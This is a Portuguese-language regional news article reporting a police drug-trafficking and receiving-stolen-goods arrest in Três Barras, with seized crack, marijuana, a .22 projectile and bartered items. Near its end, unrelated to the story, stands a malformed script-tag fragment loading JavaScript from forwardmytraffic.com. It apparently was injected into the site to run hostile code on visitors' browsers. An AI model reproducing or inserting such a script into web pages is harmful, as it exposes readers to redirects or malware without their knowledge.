InícioDestaqueTráfico de drogas e receptação em Três Barras

Tráfico de drogas e receptação em Três Barras

Últimas notícias

Na quinta-feira, 17, por volta das 17h05, equipes da PM de Três Barras foram acionadas via Copom 190 para prestar apoio a Agência de Inteligência do 3º BPM na abordagem de um veículo Fiat Uno, cujo condutor saiu de uma residência na Rua Voluntários da  Pátria, bairro João Paulo II no município de Três Barras, local suspeito de ser um ponto de tráfico de drogas.

 

 

Realizada a abordagem do veículo na estrada Geral do Tigre, onde após busca pessoal foi localizado com uma mulher quatro unidades de pedras de crack. Indagado sobre a origem da substância ilícita, os mesmos afirmaram que compraram do proprietário da residência suspeita.

 

 

Diante dos fatos a equipes PM com apoio da Agência de Inteligência e demais equipes da PM de Canoinhas deslocaram até a residência suspeita. Chegando próximo ao local da residência o mesmo tentou se evadir para uma área de mata, porém foi abordado. No interior da residência foram localizadas sete unidades de pedras de crack, quatro gramas de substância semelhante à maconha e um projétil de arma de fogo calibre 22.

 

 

No local também foram encontrados vários objetos, que o homem diz ser trocas realizadas por drogas, sendo estes objetos: uma televisão tela plana de cor preta, 39 polegadas, aonde o mesmo relatou que foi trocada por 15 unidades de crack, um modulo de som automotivo, um relógio da marca Oriente, uma bicicleta de cor branca, produtos utilizados para embalar as substâncias ilícitas, uma calculadora e R$591,50 reais em dinheiro, sendo cédulas e moedas.

 

 

Diante do ocorrido foi dada voz de prisão ao homem, informado seus direitos e conduzido o mesmo juntamente com as substâncias ilícitas, os objetos de troca e os envolvidos na posse de drogas como testemunhas, para serem tomadas as devidas providencias.

 … src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.